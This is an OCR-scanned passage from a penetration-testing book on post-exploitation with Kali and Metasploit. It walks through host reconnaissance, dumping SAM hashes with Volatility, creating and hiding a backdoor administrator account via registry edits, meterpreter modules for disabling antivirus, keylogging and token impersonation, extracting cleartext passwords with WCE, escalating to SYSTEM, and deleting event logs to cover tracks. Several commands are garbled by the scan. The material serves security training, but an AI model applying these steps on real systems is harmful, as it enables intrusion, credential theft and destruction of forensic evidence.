whoami and who -a 


These are system files that contains username and 
password hashes. It can be copied by a person with 
root-level access, and the passwords can be broken 
using a tool such as John the Ripper. 

Identify the users on a local system. 


ifconfig -a, iptables -L -n, 
andnetstat -r 


Provide networking inf ormation. ifconfig -a 
provides IP addressing details, iptables -L -n 
lists all of the rules held in the local firewall (if 
present), and netstat -r displays the routing 
information maintained by the kernel. 


uname - a 


Prints the kernel version. 


ps aux 


Prints currently running services, the process ID, 
and additional information. 


dpkg -1 yum list | grep 
installed and dpkg -1 rpm 
-qa --last | head 


Identify the installed software packages. 


These commands contain a brief synopsis of the available options. Refer to the 
appropriate command's help file for complete information on how it can be used. 


For a Windows system, the following commands will be entered: 


Command 


Description 


whoami /all 


Lists the current user, SID, user privileges, 
and groups. 
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Command 


Description 


ipconf ig /all and 
ipconfig /displaydns 


Display information regarding the network interface, 
connectivity protocols, and local DNS cache. 


netstat -bnao and 
netstat -r 


List the ports and connections with corresponding 
processes (-b) to no lookups (-n), all connections 
(-a), and parent process IDs (-0). The -r option 
displays the routing table. They require administrator 
rights to run. 


net view and 
net view /domain 


Queries NBNS/SMB to locate all of the hosts in the 
current workgroup or domain. All of the domains 
available to the host are given by / domain . 


net user /domain 


Lists all of the users in the defined domain. 


net user %username% / 
domain 


Obtains information on the current user if they are 
part of the queried domain (if you are local user, then 
/domain is not required). It includes the login times, 
the last time that the password was changed, the 
logon scripts, and the group memberships. 


net accounts 


Prints the password policy for the local system. 
To print the password policy for the domain, 
Usenet accounts /domain. 


net localgroup 
administrators 


Prints the members of the administrator's local group. 
Use the /domain switch to obtain the administrators 
for the current domain. 


net group "Domain 
Controllers" /domain 


Prints the list of domain controllers for the current 
domain. 


net share 


Displays the current shared folders, which may not 
provide sufficient access controls for the data shared 
within the folders, and the paths that they point to. 
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Using the WMIC scripting language 

On newer systems, attackers and penetration testers take advantage of built-in 
scripting languages, for example, Windows Management Instrumentation 
Command-line (WMIC), a command-line and scripting interface that is used 
to simplify access to Windows Instrumentation. If the compromised system 
supports WMIC, several commands can be used to gather information. Refer to 
the following table: 



Command 



Description 



wmic nicconfig get 
ipaddress , macaddress 

wmic computersystem get 
username 

wmic netlogin get name, 
lastlogon 

wmic desktop get 
screensaversecure , 
screens avert imeout 
wmic logon get 
authenticationpackage 

wmic process get 
caption, executablepath, 
command line 

wmic process where 
name="process_name" call 
terminate 
wmic os get name, 
servicepackma j orversion 

wmic product get name, 
version 



Obtains the IP address and MAC address 

Verifies the account that was compromised 

Determines who used this system last and when 
they last logged on 

Determines whether the screensavers are password 
protected and what the timeout is 

Determines which logon methods are supported 

Identifies system processes 



Terminates specific processes 



Determines the system's operating system 
Identifies installed software 



wmic product where Uninstalls or removes defined software packages 

name="name l call uninstall 
/ nointeractive 

wmic share get /ALL Identifies the shares accessible by the user 
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Command 



Description 



wmic /node : "machinename " Starts RDP remotely 
path Win32_ 

Terminal Service Set ting 
where 

AllowTSConnections= " 0 " 
call SetAllowTSConnections 

ii ” 

wmic nt event log get path, Finds all of the system event logs and ensures that 
filename , writeable they can be modified (used when it is time to cover 

your tracks) 



PowerShell is a scripting language built on the .NET Framework that runs from a 
console, giving the user access to the Windows filesystem and objects such as the 
registry. It is installed by default on the Windows 7 operating system and higher 
versions. PowerShell extends the scripting support and automation offered by 
WMIC by permitting the use of shell integration and interoperability on both local 
and remote targets. 

PowerShell gives testers access to a shell and scripting language on a compromised 
system. Since it is native to the Windows operating system, its use of the commands 
does not trigger the antivirus software. When scripts are run on a remote system, 
PowerShell does not write to the disk, bypassing the antivirus and whitelisting the 
controls (assuming that the user has permitted the use of PowerShell). 

PowerShell supports a number of built-in functions that are referred to as cmdlets. 
One of the advantages of PowerShell is that cmdlets are aliased to common Unix 
commands, so entering the Is command will return a typical directory listing, as 
shown in the following screenshot: 

C:\>powershell 
Uindous PowerShell 

Copyright CC) 2012 Microsoft Corporation, fill rights reserved. 

PS C:\> Is 



Directory: C : \ 



Mode 


LastUriteT ine 


Length Name 


d 


15/09/2013 


7:39 PM 


conf ig 


d 


29/11/2013 


1:12 PM 


HarddiskUo lumeShadowCopyS 


d 


11/09/2012 


11:53 AM 


Log 


d 


30/08/2013 


3:37 PM 


metasploit 
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PowerShell is a rich language capable of supporting very complex operations; it is 
recommended that the user spend the time to become familiar with its use. Some of 
the simpler commands that can be used immediately following a compromise are 
described in the following table: 



Command 


Description 


Get-Host | Select Version 


Identifies the version of PowerShell used 
by the victim's system. Some cmdlets are 
added or invoked in different versions. 


Get-Hotfix 


Identifies the installed security patches 
and system hotfixes. 


Get-Acl 


Identifies the group names and usernames. 


Get-Process, Get-Service 


Lists the current processes and services. 


gwmi Win32 useraccount 


Invokes WMI to list the user accounts. 


Gwmi Win32 group 


Invokes WMI to list the SIDs, names, 
and domain groups. 



Penetration testers can use Windows native commands, DLLs, .NET functions, 
WMI calls, and PowerShell cmdlets together to create PowerShell scripts with the 
extension .psi. 




During a recent penetration test, we were prohibited from 
installing any executable software on the client's systems. We 
used a PowerShell keylogger on a compromised system to grab 
administrator-level credentials and then compromised most of the 
systems on the network. The most effective exploit and post-exploit 
scripts, including the keylogger, are part of Nikhil Mittal's Nishang 
package (https : / / code . google . com/p/nishang/downloads/ 
de t ail? name =nishang_0 .3.0. zip). 



Reconnaissance should also extend to the local network. Since you are working 
"blind," you will need to create a map of live systems and subnets that the 
compromised host can communicate with. Start by entering ifconfig (Unix-based 
systems) or ipconfig /all (Windows systems) in the shell prompt. This will allow 
an attacker to determine the following: 

• Whether DHCP addressing is enabled. 

• The local IP address, which will also identify at least one active subnet. 
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• The gateway IP address and DNS server address. System administrators 
usually follow a numbering convention across the network, and if an 
attacker knows one address, such as a gateway server 172.16. 21. 5, they 
will ping addresses such as 172 .16.20.5, 172 . 16 . 22 . 5, and so on to find 
additional subnets. 

• The domain name used to leverage Active Directory accounts. 

If the attacking system and the target system are using Windows, the net view 
command can be used to enumerate other Windows systems on the network. 
Attackers use the net stat - rn command to review the routing table, which may 
contain static routes to networks or systems of interest. 

The local network can be scanned using nmap to sniff for ARP broadcasts. In 
addition. Kali has several tools that can be used for an SNMP endpoint analysis, 
including nmap, onesixtyone, and snmpcheck. 

Deploying a packet sniffer to map traffic will help you identify hostnames, active 
subnets, and domain names. If DHCP addressing is not enabled, it will also allow 
attackers to identify any unused, static IP addresses. Kali is preconfigured with 
Wireshark (a GUI-based packet sniffer) but you can also use t shark in a post- 
exploitation script or from the command line, as shown in the following screenshot: 

root@kali: # tshark -i 1 -VV -w traffic_out 

Running as user "root" and group "root". This could be dangerous. 

Capturing on eth0 

Frame 1: 84 bytes on wire (672 bits), 84 bytes captured (672 bits) on interface 
G 

Interface id: 0 
WTAP_ENCAP : 1 

Arrival Time: Sep 13, 2013 03:32:34.524557000 EDT 
[Time shift for this packet: 0.000000000 seconds] 

Epoch Time: 1379057554 . 5245570O0 seconds 

[Time delta from previous captured frame: 0.000000000 seconds] 

[Time delta from previous displayed frame: 0.000000000 seconds] 

[Time since reference or first frame: 0. 000000000 seconds] 

Frame Number: 1 

Frame Length: 84 bytes (672 bits) 

Capture Length: 84 bytes (672 bits) 

[Frame is marked: False] 

[Frame is ignored: False] 

[Protocols in frame: eth :ipv6 :udp :dns] 



[ 128 ] 



Chapter 5 



Finding and taking sensitive 
data - pillaging the target 

The term pillaging (sometimes known as pilfering) is a holdover from the days when 
hackers who had successfully compromised a system saw themselves as pirates racing 
to their target to steal or damage as much data as possible. The terms have survived as 
a reference to the much more careful practice of stealing or modifying proprietary or 
financial data when the objective of the exploit has been achieved. 

The attacker can then focus on the secondary target — system files that will provide 
information to support additional attacks. The choice of the secondary files will 
depend on the operating system of the target. For example, if the compromised 
system is Unix, then the attacker will also target the following: 

• The system and configuration files (usually in the /etc directory, but 
depending on the implementation, they may bein/usr/local/etcor 
other locations) 

• The password files (/etc/password and /etc/shadow) 

• The configuration files and public/ private keys in the . ssh directory 

• The public and private key rings that may be contained in the 
. gnupg directory 

• The e-mail and data files 

In a Windows system, the attacker will target the following: 

• The system memory, which can be used to extract passwords, encryption 
keys, and so on 

• The system registry files 

• The Security Accounts Manager (SAM) database that contains hashed 
versions of the password, or alternative versions of the SAM database which 
may be found in %SYSTEMROOT%\ repair \SAM and %SYSTEMROOT%\System32\ 
conf ig\RegBack\SAM 

• Any other password or seed files used for encryption 

• The e-mail and data files 

Don't forget to review folders that contain temporary items, such 
as attachments. For example, UserProf ile\AppData\Local\ 

Microsof t\Windows\Temporary Internet Files\ may 
contain files, images, and cookies that may be of interest. 
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As stated, the system memory contains a significant amount of information for any 
attacker. Therefore, it is usually a priority file that you need to obtain. The system 
memory can be downloaded as a single image file from several sources as follows: 

• By uploading a tool to the compromised system and then directly 
copying the memory (the tools include Belkasoft RAM capturer, 
MandiantMemoryze, and MonsolsDumpIt). 

• By copying Windows hibernation file, hiberf il . sys and then using 
Volatility to decrypt and analyze the file. Volatility, found on Kali in the 
Forensics menu, is a framework that was written to analyze memory 
dumps from the system RAM and other files containing system memory. It 
relies on plugins written in Python to analyze the memory and extract data, 
such as encryption keys, passwords, registry information, processes, and 
connectivity information. 

• By copying a virtual machine and converting the VMEM file to a 
memory file. 



If you upload a program designed to capture memory onto a compromised 
system, it is possible that this particular application will be identified 
as malicious software by an antivirus software. Most antivirus software 
applications recognize the hash signature and behavior of memory 
acquisition software, and act to protect the sensitive contents of the physical 
memory by raising an alarm if it is at risk of disclosure. The acquisition 
software will be quarantined, and the target will receive a warning alerting 
them of the attack. 




To avoid this, use Metasploit Framework to run the executable completely 
in the target's memory using the following command: 

meterpreter> execute -H -m -d calc.exe -f <memory 
executable + parameters> 

The previous command executes calc . exe as a dummy executable 
but uploads the memory acquisition executable to run in its process 
space instead. 

The executable doesn't show up in process lists, such as Task Manager, and 
detection using data forensic techniques is much harder because it's not 
written to disk. Furthermore, it will avoid the system's antivirus software, 
which generally does not scan the memory space in search of malware. 
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Once the physical memory has been downloaded, it can be analyzed using Volatility 
Framework, a collection of Python scripts designed to forensically analyze memory. 
If the operating system is supported. Volatility will scan the memory file and extract 
the following: 

• The image information and system data sufficient to tie the image to its 
source system. 

• The running processes, loaded DLLs, threads, sockets, connections, 
and modules. 

• The open network sockets and connections, and recently opened 
network connections. 

• The memory address, including physical and virtual memory mapping. 

• The LM/NTLM hashes and LSA secrets. LanMan (LM) password hashes 
are Microsoft's original attempt at protecting passwords. Over the years, it 
has become simple to break them and convert the hashes back into an actual 
password. NT LanMan (NTLM) hashes are more recent and resilient to 
attack. However, they are usually stored with the NTLM versions for the 
purpose of backward compatibility. Local Security Authority (LSA) stores 
"secrets" that are local passwords: remote access (wired or wireless), VPN, 
autologon passwords, and so on. Any passwords stored on the system are 
vulnerable, especially if the user reuses passwords. 

• Specific regular expressions or strings stored in memory. 

Using the sample image for a system infected with Zeus malware (https : //code . 
google . com/p/volatility/wiki/SampleMemorylmages), we'll use Volatility 
Framework to extract the encrypted LanMan password hashes. 

The first step is to determine the type of image and the operating system using the 
following command: 

root@kali :usr/share/volatility# python vol.py imageinfo -f 
/root/Desktop/zeus . vmem 
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The execution of the previous command is shown in the following screenshot: 



Volatile Systems Volatility Framework 2.2 
Determining profile based on KDBG search... 



Suggested Profile(s) 

XPSP2x86) 

AS Layerl 
AS Layer2 
PAE type 
DTB 
KDBG 



Number of Processors 
Image Type (Service Pack) 
KPCR for CPU 0 
KUSER SHARED DATA 



Image date and time 
Image local date and time 



: WinXPSP2x86 / WinXPSP3x86 (Instantiated with Win 

: JKIA32PagedMemoryPae (Kernel AS) 

: FileAddressSpace ( /root/Deskt op/zeus .vmem) 

: PAE 

: Ox319000L 
: 0x80544ce0 
: 1 
: 2 

: 0xf fdf f000 
: 0xffdf0000 

: 2010-08-15 19:17:56 UTC+0000 
: 2010-08-15 15:17:56 -0400 



The hivelist plugin will print out the initial virtual memory location for the various 
registry hives when it is called using the following command: 

root@kali :usr/share/volatility#python vol.py hivelist -f 
/root/Desktop/zeus .vmem 

The execution of the previous command is shown in the following screenshot: 



root@kali:/usr/share/volatility# python vol.py hivelist -f /root/Desktop/zeus .vmem 
Volatile Systems Volatility Framework 2.2 
Virtual Physical Name 



0xelc49008 0x036dc008 \Device\HarddiskVolumel\Documents and Settings\LocalService\Local 
SettingsXApplication DataXMic rosoft\Windows\UsrClass .dat 
0xelc41b60 0x04010b60 \Device\HarddiskVolumel\Documents and Settings\LocalService\NTUSE 
R.DAT 

0xela39638 0x021eb638 \Device\HarddiskVolumel\Documents and Settings\NetworkService\Loc 
al SettingsXApplication DataXMic rosoftXWindowsXUsrClass .dat 

0xela33008 0x01f98008 \Device\HarddiskVolumel\Documents and SettingsXNetworkServiceXNTU 
SER.DAT 

0xel53ab60 0x06b7db60 XDeviceXHa rddiskVolumel\WIND0WS\system32\conf igXsof twa re 
0xel542008 0x06c480O8 XDeviceXHa rddiskVolumel\WIND0WS\system32\config\def ault 
Oxel537b60 0x06ae4b60 \SystemRoot\System32\Config\SECURITY 

0xel544008 0x06c4b008 XDeviceXHa rddiskVolumel\WIND0WS\system32\config\SAM ◄ 

0xel3ae580 0x01bbd580 [no name] 

0xel01b008 0x01867008 XDeviceXHa rddiskVolumel\WIND0WS\system32\config\system 4 



In order to dump the hashes, the initial virtual memory locations of both the SAM and 
SYSTEM hives are required. Using the following command the results are piped to a 
comma-delimited file to be directly imported by a password-cracking application: 

root@kali :usr/share/volatility#python vol.py hashdump -f 
/root/Desktop/zeus .vmem -y 0xel01b008 -s 0xel544008 
>>/root/Desktop/hashdump . csv 
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The execution of the previous command is shown in the following screenshot: 

root@kali: usr/share/volatilit} # python vol.py hashdump -f /root/Desktop/zeus . vmem -y 0 
xel01b0O8 -s 0xel544008 

Volatile Systems Volatility Framework 2.2 

Administ rator :500 : e52cac67419a9a224a3bl08f3fa6cb6d :8846f7eaee8fbll7ad06bdd830b7586c : : : 
Guest :501 :aad3b435b51404eeaad3b435b514O4ee :31d6cfe0dl6ae931b73c59d7e0c089c0 : : : 
HelpAssistant : 1000 :4e857c004024e53cd538de64dedac36b :842b4013c45a3b8fec76ca54e5910581 : : : 
SUPPORT 388945a© : 1002 :aad3b435b514O4eeaad3b435b51404ee :8f57385a61425fc7874c3268aa249eal 



The isolated LM hashes can be cracked using Hashcat, John the Ripper, Ophcrack, 
and Rainbow Tables. 

Creating additional accounts 

The following commands are highly invasive and are usually detected by the system 
owner during the incident response process. However, they are frequently planted 
by an attacker to draw attention away from more persistent access mechanisms. 
Refer to the following table: 



Command 


Description 


net user attacker password / 
add 


Creates a new local account with a user called 
attacker with the password as password. 


net localgroup administrators 
attacker /add 


Adds the new user attacker to the local 
administrator's group. In some cases, 
the command will be net localgroup 
administrators /add attacker. 


net user username /active: yes 
/ domain 


Changes an inactive or disabled account to 
active. In a small organization, this will attract 
attention. Large enterprises with poor password 
management can have 30 percent of their 
passwords flagged as "inactive," so it may 
be an effective way to gain an account. 


net share name$=C:\ / 
grant : attacker , FULL / 
unlimited 


Shares C : (or another specified drive) as a 
Windows share, and grants the user (attacker) 
full rights to access or modify all of the content 
on that drive. 
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If you create a new user account, it will be noticed when anyone logs onto the 
welcome screen of the compromised system. To make the account invisible, you need 
to modify the registry from the command line using the following reg command: 

REG ADD 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion 
\WinLogon\SpecialAccounts\UserList /V account name / 

T REG_DWORD /D 0 

This will modify the designated registry key to hide the account of the user (/v). 
Again, there may be special syntax requirements based on the specific version of the 
target's operating system, so determine the Windows version first and then validate 
it in a controlled test environment before implementing it against the target. 

Using Metasploit for post-exploit 
activities 

Metasploit was developed to support both exploit and post-exploit activities. The 
present version contains approximately 200 modules that simplify post-exploit 
activities. We will review some of the most important modules. 

In the following screenshots, we have successfully exploited a Windows XP system 
(a "classic" attack that is frequently used to validate more complex aspects of 
meterpreter). The initial step is to conduct an immediate reconnaissance of the 
network and the compromised system. 

The initial meterpreter shell is fragile and vulnerable to failure over an 
extended period of time. Therefore, once a system is exploited, we will migrate the 
shell and bind it with a more stable process. This also makes detecting the exploit 
more difficult. 

At the meterpreter prompt, enter ps to obtain a list of running processes, as shown 
in the following screenshot: 
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meterp reter > ps 
Process List 



PID 


PPID 


Name 


Arch 


Session 


User 


0 


0 


[System Process] 




4294967295 




4 


0 


System 


x86 


0 


NT AUTHORITYXSYSTEM 


396 


628 


logon .sc r 


x86 


0 


RWBEGGS - lE69067\Administ rat o r 


512 


4 


smss.exe 


x86 


0 


NT AUTHORITYXSYSTEM 


604 


512 


csrss .exe 


x86 


0 


NT AUTHORITYXSYSTEM 


628 


512 


winlogon .exe 


x86 


0 


NT AUTHORITYXSYSTEM 


672 


628 


services .exe 


x86 


0 


NT AUTHORITYXSYSTEM 


684 


628 


lsass.exe 


x86 


0 


NT AUTHORITYXSYSTEM 


748 


1264 


TPAutoConnect .exe 


x86 


0 


RWBEGGS -lE69067\Administ rat or 


844 


672 


vmacthlp.exe 


x86 


0 


NT AUTHORITYXSYSTEM 


860 


672 


svchost .exe 


x86 


0 


NT AUTHORITYXSYSTEM 


944 


672 


svchost .exe 


x86 


0 


NT AUTH0RITYXNETW0RK SERVICE 


1036 


672 


svchost .exe 


x86 


0 


NT AUTHORITYXSYSTEM 


1080 


672 


svchost .exe 


x86 


0 


NT AUTH0RITYXNETW0RK SERVICE 


1124 


672 


svchost .exe 


x86 


0 


NT AUTH0RITYXL0CAL SERVICE 


1208 


1036 


wscntfy.exe 


x86 


0 


RWBEGGS -lE69067\Administ rat or 


1264 


672 


TPAutoConnSvc .exe 


x86 


0 


NT AUTHORITYXSYSTEM 


1424 


1036 


wuauclt .exe 


x86 


0 


RWBEGGS - lE69067\Administ rat o r 


1460 


1440 


explorer.exe 


x86 


0 


RWBEGGS -lE69067\Administ rat or 


1544 


672 


spoolsv.exe 


x86 


0 


NT AUTHORITYXSYSTEM 


1680 


1460 


vmtoolsd .exe 


x86 


0 


RWBEGGS -lE69067\Administ rat or 


1808 


672 


alg .exe 


x86 


0 


NT AUTH0RITYXL0CAL SERVICE 


1976 


1460 


cmd .exe 


x86 


0 


RWBEGGS -lE69067\Administ rat or 


2016 


672 


vmtoolsd .exe 


x86 


0 


NT AUTHORITYXSYSTEM 



The ps command also returns the full pathname for each process. This was omitted 
from the previous screenshot. The ps list identifies that c : \windows\Explorer . 
exe is running. In this particular case, it is identified with the process ID of 14 6 0, as 
shown in the following screenshot. As this is a generally stable application, we will 
migrate the shell to that process. 

meterp reter > migrate 146G 

[*] Migrating from 1036 to 146G... 

Migration completed successfully. 

Now that we have a stable shell connection to the remote system, we will use the 
meterpreter scripts that support post-exploitation activities. 
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One of the first parameters to identify is: are we on a virtual machine? With the 
meterpreter session open between the compromised system and the attacker, 
the command run checkvm is issued, as shown in the following screenshot. The 
returned data indicates that This is a VMware virtual Machine. 

msf exploit (ms08_067_netapi) > exploit 

[*] Started reverse handler on 192.168.43.130:4444 
[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP - Service Pack 3 - lang:English 
[*] Selected Target: Windows XP SP3 English ( AlwaysOn NX) 

[*] Attempting to trigger the vulnerability... 

[*] Sending stage (752128 bytes) to 192.168.43.128 

[*] Meterpreter session 1 opened (192.168.43.130:4444 -> 192.168.43.128:1094) 
meterp reter > run checkvm 

[*] Checking if target is a Virtual Machine 

[* J This_ is a VMwa re Vi rtual Machine 



Some of the most important post-exploit modules available through meterpreter 
are described in the following table: 



Command 



Description 



run checkvm 



Determines if a virtual machine is present. 



run getcountermeasure 
run killav 

run hostsedit 

run winenum 
run scraper 

run upload and run download 



Checks the security configuration on the exploited 
system (antivirus, firewalls, and so on). 

Disables most of the antivirus services running on 
the compromised system. This script is frequently 
out of date, and success should be manually verified. 

Allows the attacker to add entries to the Windows 
HOSTS file. This can divert traffic to a different 
site (a fake site), which will download additional 
tools or ensure that the antivirus software cannot 
connect to the Internet or a local server to obtain 
signature updates. 

Performs a command-line and WMIC 
characterization of the exploited system. It dumps 
the important keys from the registry and LM hashes. 

Gathers comprehensive information that has not 
been gathered by other scripts, such as the entire 
Window registry. 

Allows the attacker to upload and download files 
on the target system. 
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Command 


Description 


run 


keyscan start, run 


Starts and stops a local keylogger on the exploited 


keyscan stop, and run 


system. When the data collection is complete, the 


keyscan_dump 


collected text data is dumped on the attacker's system. 


run 


getprivs 


Attempts to enable all of the privileges available 
to the current process. It's very useful for privilege 
escalation. 


run 


getsystem 


Attempts to elevate privileges to the Windows 
SYSTEM level; grants the fullest possible escalation 
of a user's privileges. 


Run 


hashdump 


Dumps the contents of the SAM database on the 
attacker's system. 


run 


getgui 


Allows the user to enable RDP (getgui - e) and 
set the username and password (getgui -u). The 
get telnet script can be run in the same manner. 


run 


vnc 


Gives the attacker a remote GUI (VNC) to the 
compromised system. 



One of the most effective meterpreter scripts is the Windows enumerator 
(winenum). As seen in the following screenshot, it uses both command-line and 
WMIC calls to fully characterize the target system: 



mQterp reter > run winenum 



[* 



[* 



Running Windows Local Enumeration Meterpreter Script 
New session on 192.168.43.128:445... 

Saving general report to /root/ .msf 4/logs/sc ripts/winenu 
Output of each individual command is saved to /root/. msf 

Checking if RWBEGGS - 1 E69067 is a Virtual Machine 

UAC is Disabled 
Running Command List . . . 

running command netstat -vb 
running command netstat -ns 
running command net accounts 
running command route print 
running command net view 
running command netstat -nao 
running command ipconfig /displaydns 
running command ipconfig /all 
running command arp -a 
running command cmd.exe /c set 
running command tasklist /svc 
running command net group administrators 
running command net view /domain 
running command netsh firewall show config 

running command net localgroup administrators 

running command net localgroup 

running command net user 

running command net group 

running command net share 

running command net session 

running command gp result /SCOPE USER /Z 
running command gp result /SCOPE COMPUTER /Z 
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In addition to the enumeration, the winenum script also dumps the registry and 
collects the system hashes for decryption as shown in the following screenshot: 



[*] Running WMIC Commands .... 

running command wmic share get name, path 

running command wmic nteventlog get path, filename, writeable 
running command wmic netlogin get name,lastlogon,badpasswordcount 
running command wmic netclient list brief 

running command wmic netuse get name, username, connectiontype,localname 

running command wmic logicaldisk get desc ription, filesystem, name, size 

running command wmic volume list brief 

running command wmic service list brief 

running command wmic group list 

running command wmic useraccount list 

running command wmic qfe 

running command wmic product get name, version 
running command wmic rdtoggle list 
running command wmic startup list full 
Extracting software list from registry 
[*] Dumping password hashes... 

[ + J Hashes Dumped 
[*] Getting tokens . . . 

[*] All tokens have been processed 
[*] Done! 



The meterpreter comes with several useful libraries that support complex 
functions. For example, the espia library supports screenshots of the compromised 
system via the following commands: 

meterpreter> use espia 
Loading extension espia ... success. 
meterpreter> screenshot /Desktop/target . jpeg 
Screenshot saved to: /root/xsWoDDbW. jpeg 

The stdapi library allows a remote attacker to manipulate a webcam by 
collecting audio and video from the compromised system and relaying that 
data back to the attacker. 
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Escalating user privileges on a 
compromised host 

It is usually possible to get Guest or User access to a system. Frequently, the attacker's 
ability to access important information will be limited by such reduced privilege levels. 
Therefore, a common post-exploit activity is to escalate access privileges from Guest 
to User to Administrator and, finally, to system. This upward progression of gaining 
access privileges is usually referred to as vertical escalation. 

The user can implement several methods to gain advanced access credentials, 
including the following: 

• Employ a network sniffer and/ or keylogger to capture transmitted user 
credentials (dsnif f is designed to extract passwords from live transmissions 
or a pcap file saved from a Wireshark or tshark session). 

• Perform a search for locally stored passwords. Some users collect passwords 
in an e-mail folder (frequently called passwords). Since password reuse and 
simple password construction systems are common, the passwords that are 
found can be employed during the escalation process. 

NirSoft (www . nirsof t . net) produces several free tools that can be uploaded 
to the compromised system using meterpreter to extract passwords from 
the operating system and applications that cache passwords (mail, remote 
access software, FTP, and web browsers). 

• Dump the SAM and syskey files using meterpreter or applications such as 
hobocopy, fgdump, and pwdump (these can be uploaded on the target using 
meterpreter). 

• Inject malicious code directly into a service running at the system level using 
a tool such as process injector (www. tarasco . org/security/Process_ 

Inj ector/). 

• When some applications load, they read dynamic link library (DLL) files 
in a particular order. It is possible to create a fake DLL with the same 
name as a legitimate DLL, place it in a specific directory location, and 
have the application load and execute it, resulting in elevated privileges 
for the attacker. Several applications are known to be vulnerable to such 
DLL hijacking (www . exploit -db . com/ dll -hi j acking- vulnerable - 
appli cat ions/). 
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• Apply an exploit that uses a buffer overflow or other means to 
escalate privileges. 

• Execute the get system script, which will automatically escalate 
administrator privileges to the system level, from the meterpreter prompt. 




Windows 7 and 2008 don't allow remote access to administrative shares, 
such as ADMIN$, C$, and so on, from untrusted systems. These shares 
may be required for meterpreter scripts, such as incognito, or to 
support attacks over SMB. To address this issue, add HKEY_LOCAL_ 
MACHINE \ SOFTWARE \Mi crosoft\ Windows \ Cur rent Vers ion\ 
Policies\Systemto the registry, and add a new DWORD (32-bit) key 
named LocalAccountTokenFilterPolicy and set the value to 1. 



Replaying authentication tokens 
using incognito 

One particularly interesting meterpreter library is incognito, which allows you 
to impersonate and replay user tokens. Tokens are temporary keys that allow you to 
access network and system resources without needing to provide your password or 
other credentials with each particular access. These tokens persist on a system until it 
is rebooted. 



Once you have compromised a system, you can use tokens to impersonate a previous 
user who created tokens, without the need to crack the user's password. This token 
impersonation may allow an attacker to escalate their privileges. 

At the prompt, type the following: 

use incognito 

The execution of the previous command is shown in the following screenshot: 



Incognito Commands 



Command 



Desc ription 



add_g roupjuser 
add_Ioca!g roupjjse r 
add_user 

impe rsonate_token 
list_tokens 
snarf hashes 



Attempt to add a user to a global group with all tokens 
Attempt to add a user to a local group with all tokens 
Attempt to add a user with all tokens 
Impersonate specified token 

List tokens available under current user context 
Snarf challenge/ response hashes for every token 
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The first step is to identify all of the valid tokens that are present on the 
compromised system. The number of tokens that you can see will depend on the 
level of access that was initially used to compromise the target system. 

You will also see that there are two types of tokens, as shown in the following 
screenshot. Delegation tokens support interactive logons (for example, logging onto 
a system locally or via a remote desktop). Impersonate tokens are for noninteractive 
sessions, such as for when a system connects to a network drive. 

meterp reter > list_tokens -u 

[-] Warning: Not currently running as SYSTEM, not all tokens will be available 
Call rev2self if primary process token is SYSTEM 

Delegation Tokens Available 



RWBEGGS - lE69067\Administ rato r 
Impersonation Tokens Available 



No tokens available 



As you can see, a delegation token has been identified as an Administrator. If we 
can impersonate this token, we can assume its privileges. 

When invoking the impersonate_token command in incognito (as shown in the 
following screenshot), note that two backslashes are required in the command: 

meterp reter > \impersonate_token RWBEGGS -lE69067\\Administ rato r 
[-] Warning: Not currently running as SYSTEM, not all tokens will be available 
Call rev2self if primary process token is SYSTEM 
[+] Delegation token available 

[+] Successfully impersonated user RWBEGGS -lE69067\Administ rato r 



Now, if we run the shell command from the meterpreter prompt and enter whoami, 
it will identify us as the administrator whose token we impersonated. 
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Manipulating access credentials with 
Windows Credential Editor 

The Windows Credential Editor (WCE) —http : / /www. ampliasecurity . com/ 
research/ wcef aq . html — is a refined version of the incognito script. It is available 
in 32-bit and 64-bit versions as well as a "universal" version that is claimed to be 
workable on all Windows platforms. WCE allows users to do the following: 

• Perform pass-the-hash attacks on Windows systems 

• Collect NTLM credentials from the system memory (with or without 
code injection) 

• Collect Kerberos tickets from Windows systems 

• Use the collected Kerberos tickets on other Windows or Unix systems 
to gain access 

• Dump cleartext passwords stored by Windows systems 
(see the following section) 

To use WCE, upload the executable to the compromised system from the 
meterpreter prompt. Then, initiate an interactive shell and execute WCE. As you 
can see in the following screenshot, the -w option readily extracted the cleartext 
Administrator password: 

meterp refer > shell 
Process 3868 created. 

Channel 2 created. 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

c:\>wce.exe -w 
wce.exe -w 

WCE vl.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by 
Hernan Ochoa (hernan@ampliasecurity.com) 

Use -h for help. 



DigitalDefenceXRWBEGGS - 1E69067 : da rksta r 
Administ rator\RWBEGGS-lE69067 : 

NETWORK SERVICEXWORKGROUP: 
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Escalating from Administrator to SYSTEM 

Administrator privileges allow an attacker to create and manage accounts and access 
most data available on a system. However, some complex functionality mandates 
that the requester have system level access privileges. There are several ways to 
continue this escalation to the system level. The most common is to use the at 
command, which is used by Windows to schedule tasks for a particular time. The at 
command always runs with privileges at the system level. 

Using an interactive shell (enter shell at the meterpreter prompt), open a 
command prompt and determine the compromised system's local time. If the time 
is 12:50 P.M. (the at function uses a 24-hour notation), schedule an interactive 
command shell for a later time, as shown in the following screenshot: 

C:\>at 12:51 /interactive cmd 
at 12:51 /interactive cmd 
Added a new job with job ID = 1 



After the at task was scheduled to run, reconfirm your access privileges at the 
meterpreter prompt, as shown in the following screenshot: 

meterp reter > getuid 

Server username: NT AUTHORITY/ SYSTEM 



As you can see, the privileges have been escalated to the system level. 

Accessing new accounts with horizontal 
escalation 

In horizontal escalation, the attacker retains their existing credentials but uses them 
to act on a different user's account. For example, a user on compromised system A 
attacks a user on system B in an attempt to compromise them. 

We will use horizontal escalation attacks when we review some attack vectors, such 
as remote access attacks. 



[ 143 ] 




Post Exploit - Action on the Objective 



Covering your tracks 

Once a system has been exploited, the attacker must cover their tracks to 
avoid detection, or at least make the reconstruction of the event more difficult for 
the defender. 

An attacker may completely delete the Windows event logs (if they are being actively 
retained on the compromised server). This can be done via a command shell to the 
system and using the following command: 

C:\ del %WINDIR%\* . log /a/s/q/f 

The command directs for all of the logs to be deleted (/a), including the files 
from all of the subfolders (/s). The /q option disables all of the queries, asking for 
a yes or no response, and the /f option forcibly removes the files, making recovery 
more difficult. 



This can also be done from the meterpreter prompt by issuing the command 
clearev. This will clear the application, system, and security logs from the target 
(there are no options or arguments for this command). 

Ordinarily, deleting a system log does not trigger any alerts to the user. In fact, most 
organizations configure logging so haphazardly that missing system logs are treated 
as a possible occurrence, and their loss is not deeply investigated. 

Metasploit has an additional trick up its sleeve — the timestomp option allows 
an attacker to make changes to the MACE parameters of a file (the last modified. 
